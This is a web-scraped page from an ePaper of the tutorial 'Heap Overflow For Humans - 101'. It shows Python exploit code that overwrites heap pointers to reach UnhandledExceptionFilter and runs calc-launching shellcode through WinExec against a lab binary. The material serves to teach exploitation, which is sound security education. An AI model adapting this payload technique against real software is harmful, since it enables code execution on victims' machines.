12.07.2015 Views

Heap Overflow For Humans - 101

Heap Overflow For Humans - 101

Heap Overflow For Humans - 101

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

11exploit = ("\xcc" * 272)exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()exploit += ("\xcc" * 272)os.system('"C:\\Documents and Settings\\Steve\\Desktop\\odbg110\\OLLYDBG.EXE" heap-uef.exe ' + exploit)Of course we simply calculate the offset to this part of the shellcode and insert ourJMP instruction code and insert our shellcode:import oscalc = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9""\x44\x80\xc2\x77" # address to WinExec()"\xFF\xD1\x90\x90")exploit = ("\x44" * 264)exploit += "\xeb\x14" # our JMP (over the junk and into nops)exploit += ("\x44" * 6)exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()exploit += ("\x90" * 21)exploit += calcos.system('heap-uef.exe ' + exploit)Boom !mr_me's IT security blog - 11 / 12 - 10.01.2011

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!